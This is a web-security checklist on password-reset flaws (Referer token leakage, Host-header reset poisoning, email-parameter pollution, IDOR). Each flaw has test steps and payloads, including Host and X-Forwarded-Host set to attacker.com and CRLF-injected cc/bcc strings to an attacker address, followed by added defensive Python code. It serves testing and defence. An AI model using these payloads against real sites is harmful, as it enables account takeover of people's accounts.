Password Reset Token Leak via Referrer

  1. Request a password reset for your own email address
  2. Click on the password reset link
  3. Don't change the password
  4. Click any third-party website link on the page (e.g. Facebook, Twitter)
  5. Intercept the request in the Burp Suite proxy
  6. Check whether the Referer header is leaking the password reset token.
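The following is an added example, not code from the original checklist, showing the server-side controls that close this leak: the tokenized link is redeemed immediately and the browser is redirected to a token-free URL before any page with third-party resources renders, the reset pages are served with `Referrer-Policy: no-referrer`, and tokens are single-use with a short lifetime. `ResetTokenStore`, `handle_reset_link`, `referer_exposes_token` and `TOKEN_TTL_SECONDS` are this example's own names and assumptions; the last function is a log-check helper for spotting a Referer that still carries a token.

```python
import secrets
import time
from urllib.parse import parse_qs, urlsplit

# Assumed lifetime of a reset token; kept short so a leaked one goes stale fast.
TOKEN_TTL_SECONDS = 15 * 60


class ResetTokenStore:
    """In-memory single-use token store (constructed for this example)."""

    def __init__(self, now=time.time):
        self._now = now            # injectable clock so expiry can be tested
        self._tokens = {}          # token -> (user_id, expires_at)

    def issue(self, user_id):
        token = secrets.token_urlsafe(32)
        self._tokens[token] = (user_id, self._now() + TOKEN_TTL_SECONDS)
        return token

    def redeem(self, token):
        """Consume the token exactly once; returns the user id or None."""
        entry = self._tokens.pop(token, None)   # removed even if it turns out expired
        if entry is None:
            return None
        user_id, expires_at = entry
        return user_id if self._now() <= expires_at else None


def handle_reset_link(url, store, session):
    """GET handler for the emailed link. Returns (status, headers, body).

    The token is redeemed right away and the browser is redirected to a
    token-free URL, so by the time the reset form (and any third-party
    content on it) loads there is no token left in the address bar.
    """
    query = parse_qs(urlsplit(url).query)
    token = query.get("token", [None])[0]
    user_id = store.redeem(token) if token else None
    headers = {"Referrer-Policy": "no-referrer", "Cache-Control": "no-store"}
    if user_id is None:
        return 400, headers, "invalid or expired reset link"
    session["reset_user_id"] = user_id      # server-side binding for the form POST
    headers["Location"] = "/reset-password"
    return 302, headers, ""


def referer_exposes_token(referer):
    """Detection helper for proxy or web-server logs: does an outbound Referer
    still carry a reset token? True means the controls above are missing."""
    if not referer:
        return False
    return "token" in parse_qs(urlsplit(referer).query)
```

Run `referer_exposes_token` over the Referer column of your proxy or CDN logs for requests leaving the reset page; any hit is a live instance of the leak described in the checklist.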

Account Takeover Through Password Reset Poisoning

  1. Intercept the password reset request in Burp Suite

  2. Add or edit the following headers in Burp Suite:

    Host: attacker.com
    X-Forwarded-Host: attacker.com

  3. Forward the request with the modified headers

    POST https://example.com/reset.php HTTP/1.1
    Accept: */*
    Content-Type: application/json
    Host: attacker.com
    
  4. Look for a password reset URL based on the Host header, like: https://attacker.com/reset-password.php?token=TOKEN
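As an added example (not the page's or any project's code), here is the defensive counterpart: the reset link is built from a configured canonical origin rather than from any request header, and requests whose `Host` or `X-Forwarded-Host` fall outside an allowlist are refused, which also produces a log line worth alerting on. `CANONICAL_ORIGIN`, `ALLOWED_HOSTS`, `offending_host_header`, `build_reset_url` and `HostNotAllowed` are this example's own names and assumed deployment values.

```python
from urllib.parse import urlencode

# Assumed deployment configuration; read from settings in practice, never from the request.
CANONICAL_ORIGIN = "https://example.com"
ALLOWED_HOSTS = {"example.com", "www.example.com"}


class HostNotAllowed(Exception):
    """Raised when Host or X-Forwarded-Host is outside the allowlist."""


def _hosts_in(value):
    """Split a possibly comma-separated header value into normalized host names
    (lower-cased, explicit port removed). Every entry must be allowlisted, so a
    proxy-appended list such as 'example.com, attacker.com' is still rejected."""
    hosts = []
    for item in value.split(","):
        item = item.strip().lower()
        host, _, port = item.rpartition(":")
        hosts.append(host if host and port.isdigit() else item)
    return hosts


def offending_host_header(headers):
    """Return (name, value) of the first host-bearing header that is missing or
    not allowlisted, or None when the request's host headers are acceptable."""
    lowered = {k.lower(): v for k, v in headers.items()}
    if "host" not in lowered:                      # HTTP/1.1 requires Host
        return ("host", None)
    for name in ("host", "x-forwarded-host"):
        value = lowered.get(name)
        if value is not None and any(h not in ALLOWED_HOSTS for h in _hosts_in(value)):
            return (name, value)
    return None


def build_reset_url(headers, token):
    """Build the link that goes into the reset e-mail.

    The origin comes from configuration, so a poisoned Host header cannot
    redirect the token. Off-list hosts are refused outright rather than
    silently corrected, which keeps the probe visible in the logs.
    """
    bad = offending_host_header(headers)
    if bad is not None:
        raise HostNotAllowed(f"{bad[0]}: {bad[1]!r}")
    return f"{CANONICAL_ORIGIN}/reset-password?{urlencode({'token': token})}"
```

Frameworks usually expose the same allowlist idea (Django's `ALLOWED_HOSTS`, for instance), but the second half of the fix, never deriving the link's origin from the request, is application code and has to be checked by reading the reset handler.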

Password Reset via Email Parameter

# parameter pollution
email=victim@example.com&email=attacker@example.com

# array of emails
{"email":["victim@example.com","attacker@example.com"]}

# carbon copy
email=victim@example.com%0A%0Dcc:attacker@example.com
email=victim@example.com%0A%0Dbcc:attacker@example.com

# separator
email=victim@example.com,attacker@example.com
email=victim@example.com%20attacker@example.com
email=victim@example.com|attacker@example.com
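The following is an added example, not code from the original page, of a strict parser for the email field of a reset request that rejects every variant listed above: repeated parameters, a JSON array, CR/LF smuggling of `cc:`/`bcc:` mail headers, and the comma, space and pipe separators. `parse_reset_email`, `is_valid_reset_email` and `InvalidResetEmail` are this example's own names; the address syntax is deliberately narrower than RFC 5322.

```python
import json
import re
from urllib.parse import parse_qs

# Deliberately conservative syntax: one local part, one domain, and no whitespace,
# commas, pipes, angle brackets or control characters anywhere.
_EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")


class InvalidResetEmail(ValueError):
    """The request does not name exactly one well-formed address."""


def parse_reset_email(body, content_type):
    """Return the single address a reset request names (lower-cased), or raise."""
    if content_type.split(";")[0].strip() == "application/json":
        data = json.loads(body)
        if not isinstance(data, dict) or "email" not in data:
            raise InvalidResetEmail("missing email")
        value = data["email"]
        if isinstance(value, list):             # the {"email": [a, b]} variant
            raise InvalidResetEmail("email must not be an array")
    else:
        # parse_qs keeps every repeated key, so email=a&email=b shows up as two values
        values = parse_qs(body, keep_blank_values=True).get("email", [])
        if len(values) != 1:
            raise InvalidResetEmail("exactly one email parameter is required")
        value = values[0]
    if not isinstance(value, str):
        raise InvalidResetEmail("email must be a string")
    # %0A%0D decodes to LF/CR; that is how "cc:"/"bcc:" ends up inside the mail headers
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        raise InvalidResetEmail("control characters in email")
    if _EMAIL_RE.fullmatch(value) is None:      # rejects ',', ' ', '|' and a second '@'
        raise InvalidResetEmail("malformed email")
    return value.lower()


def is_valid_reset_email(body, content_type):
    """Boolean wrapper, handy for tests and for replaying logged request bodies."""
    try:
        parse_reset_email(body, content_type)
        return True
    except ValueError:          # InvalidResetEmail and json.JSONDecodeError
        return False
```

Parsing is only half of the fix: after validation, look the account up by the submitted address and send the mail to the address stored on the account record, so even an unexpected parser quirk cannot redirect the message.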

IDOR on API Parameters

  1. The attacker has to log in with their own account and go to the Change password feature.

  2. Start Burp Suite and intercept the request

  3. Send it to the Repeater tab and edit the parameters: user ID / email

    POST /api/changepass
    [...]
    {"form": {"email":"victim@example.com","password":"securepwd"}}
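As an added example, not the page's or any real API's code, here is a change-password handler written so that the IDOR above cannot work: the target account comes from the authenticated session, identifiers in the body are never used for lookup (a body naming a different account than the session only produces an audit entry, since that is exactly the probe described), and the current password is required before the change. `change_password`, `add_user`, `verify_login`, `AUDIT_LOG`, the user table and the addresses in the test are all constructed for this example.

```python
import hashlib
import hmac
import os

PBKDF2_ROUNDS = 200_000        # assumed work factor
MIN_PASSWORD_LENGTH = 12       # assumed policy
AUDIT_LOG = []                 # stands in for the real audit sink


class Forbidden(Exception):
    pass


def _derive(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)


def add_user(users, user_id, email, password):
    """Populate the constructed user table: user_id -> record."""
    salt = os.urandom(16)
    users[user_id] = {"email": email, "salt": salt, "hash": _derive(password, salt)}


def verify_login(users, user_id, password):
    record = users.get(user_id)
    return record is not None and hmac.compare_digest(_derive(password, record["salt"]), record["hash"])


def change_password(session, body, users):
    """Handler for POST /api/changepass. Returns the id of the account changed.

    The account is whoever the session belongs to. Any email or user id in the
    body is ignored for lookup; when it names someone other than the session
    user it is written to the audit log, because that is an IDOR probe.
    """
    user_id = session.get("user_id")
    if user_id is None:
        raise Forbidden("not authenticated")
    record = users[user_id]
    form = body.get("form") or {}
    own = {"email": record["email"], "user_id": user_id}
    for key, value in form.items():
        if key in own and value != own[key]:
            AUDIT_LOG.append(f"changepass: session user {user_id} sent {key}={value!r}")
    # Re-authenticate before a credential change so a hijacked session alone is not enough.
    if not verify_login(users, user_id, form.get("current_password", "")):
        raise Forbidden("current password does not match")
    new_password = form.get("password", "")
    if len(new_password) < MIN_PASSWORD_LENGTH:
        raise ValueError("new password too short")
    salt = os.urandom(16)
    record["salt"], record["hash"] = salt, _derive(new_password, salt)
    return user_id
```

When reviewing a real endpoint, the question to ask is simply where `user_id` comes from: if it is read from the body, query string or a client-controlled header rather than from the session or token, the endpoint has the flaw this section describes.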